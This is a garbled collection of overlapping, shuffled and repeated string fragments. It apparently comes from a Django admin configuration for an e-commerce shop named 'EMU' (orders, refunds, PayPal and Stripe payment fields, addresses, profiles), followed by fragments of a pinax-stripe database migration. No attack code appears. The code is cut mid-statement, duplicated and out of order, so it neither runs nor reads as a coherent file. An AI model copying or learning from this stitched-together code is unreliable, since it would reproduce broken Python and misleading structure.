= 5 date_hierarchy = 'timestamp' fieldsets = ( ('Customer',", "to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered',", "'label'] inlines = [ProductImageModel] list_per_page = 3 def product_image(self, obj): return format_html(f''' <img", "= 'Update orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display", "CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received',", "class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address', 'town', 'country', 'zip', 'address_type', 'default'] list_filter", "ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price', 'discount_price', 'slug', 'label'] inlines = [ProductImageModel] list_per_page", "django.contrib.auth.models import Group from .models import Product, CartProduct, Order, Address, Payment, Coupon, Refund,", "'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity', 'ordered'] readonly_fields =", "'Update refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted', 'email',", "'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter =", "= ['default', 'address_type', 'country'] search_fields = ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date'", "('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total", "OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address',", "format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description", "CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to accepted'", "class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title = \"EMU\" admin.site.site_header = \"EMU\"", "'country'] search_fields = ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin):", "ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price', 'discount_price', 'slug', 'label'] inlines", "CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity', 'ordered'] readonly_fields = ['user', 'product', 'quantity', 'ordered']", "actions = [make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code',", "list_filter = ['default', 'address_type', 'country'] search_fields = ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy =", "granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders to received' @admin.register(Category)", "['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}),", "'ordered_date'] date_hierarchy = 'ordered_date' fieldsets = [ ('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}),", "Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display =", ".models import Product, CartProduct, Order, Address, Payment, Coupon, Refund, Setting, ProductImages, Profile, \\", "'product', 'quantity', 'ordered'] list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date',", "AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address', 'town', 'country', 'zip', 'address_type', 'default'] list_filter =", "refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders to refund granted' def make_product_received(modeladmin, request, queryset):", "'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets = [", "Address, Payment, Coupon, Refund, Setting, ProductImages, Profile, \\ Contact, Category, Size # admin.site.unregister(Group)", "'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets =", "list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address', 'payment',", "pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile', {'fields': ['user', 'country', 'phone_number']}),", "'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title = \"EMU\" admin.site.site_header", "fieldsets = [ ('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered',", "# from django.contrib.auth.models import Group from .models import Product, CartProduct, Order, Address, Payment,", "'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user', 'amount', 'timestamp']", "'shipping_address', 'payment', 'coupon'] search_fields = ['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields =", "refund_granted=True) make_refund_accepted.short_description = 'Update orders to refund granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True)", "search_fields = ['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered', 'billing_address',", "Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset):", "orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user',", "@admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price', 'discount_price', 'slug', 'label'] inlines =", "Contact, Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin):", "'payment', 'coupon'] search_fields = ['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields = ['user',", "list_display = ['user', 'date', 'address', 'town', 'country', 'zip', 'address_type', 'default'] list_filter = ['default',", "refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req']", "make_product_received.short_description = 'Update orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin):", "CartProduct, Order, Address, Payment, Coupon, Refund, Setting, ProductImages, Profile, \\ Contact, Category, Size", "'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user', 'amount', 'timestamp'] list_per_page = 5", "return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True)", "= ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date'", "Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount", "{'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display", "{'fields': ['user', 'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}), ] readonly_fields = ['user', 'country',", "Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True)", "['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered", "'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets = [ ('Name', {'fields': ['user', 'ip', 'billing_address',", "'ip'] list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address',", "'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass", "import Product, CartProduct, Order, Address, Payment, Coupon, Refund, Setting, ProductImages, Profile, \\ Contact,", "queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders to refund granted' def make_product_received(modeladmin, request,", "class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address',", "orders to refund granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders", "'email', 'date_req'] readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason'] actions = [refund_accepted] date_hierarchy", "= 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email',", "('User Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}), ] readonly_fields =", "= [ ('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date',", "list_per_page = 5 date_hierarchy = 'timestamp' fieldsets = ( ('Customer', {'fields': ['user']}), ('Stripe", "class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields = ['order', 'ref_code',", "'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key',", "@admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title = \"EMU\" admin.site.site_header =", "Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery Status',", ") @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update", "queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order)", "'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets = [ ('Name', {'fields': ['user',", "{'fields': ['image']}), ] readonly_fields = ['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass", "= 'Update orders to refund granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description =", "'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter = ['ordered', 'being_delivered', 'received',", "['name', 'product_image', 'price', 'discount_price', 'slug', 'label'] inlines = [ProductImageModel] list_per_page = 3 def", "readonly_fields = ['user', 'product', 'quantity', 'ordered'] list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display", "\\ Contact, Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class", "['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display =", "'slug', 'label'] inlines = [ProductImageModel] list_per_page = 3 def product_image(self, obj): return format_html(f'''", "'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields = ['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields", "@admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile', {'fields':", "'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin):", "date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name',", "= ['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason']", "list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields = ['order', 'ref_code', 'accepted', 'email',", "= ['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address',", "date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [", "'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon',", "list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment',", "class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled',", "= ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount']", "'quantity', 'ordered'] readonly_fields = ['user', 'product', 'quantity', 'ordered'] list_per_page = 5 @admin.register(Address) class", "Refund, Setting, ProductImages, Profile, \\ Contact, Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model", "'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin,", "'paypal_amount'] list_display = ['user', 'amount', 'timestamp'] list_per_page = 5 date_hierarchy = 'timestamp' fieldsets", "request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass" ]
[ "('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)),", "null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document',", "], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False,", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2,", "'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True,", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()),", "models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer',", "models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee',", "models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)),", "null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status',", "to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32,", "class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [", "models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received',", "models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ),", "('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True,", "('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items',", "name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind',", "('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind',", "('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee',", "max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at',", "decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd',", "('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)),", "models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True,", "models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract':", "null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True,", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type',", "null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at',", "), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)),", "False, }, ), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Account',", "options={ 'abstract': False, }, ), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method',", "('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)),", "models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True,", "('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1',", "models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)),", "model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[", "False, }, ), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2,", "}, ), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True,", "), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account',", "to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'),", "('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end',", "('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True,", "models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True,", "models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)),", "null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)),", "max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True,", "primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True,", "decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()),", "('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract':", "null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor',", "to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card',", "models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)),", "models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)),", "null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)),", "models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method',", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count',", "models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)),", "migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount',", "('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), 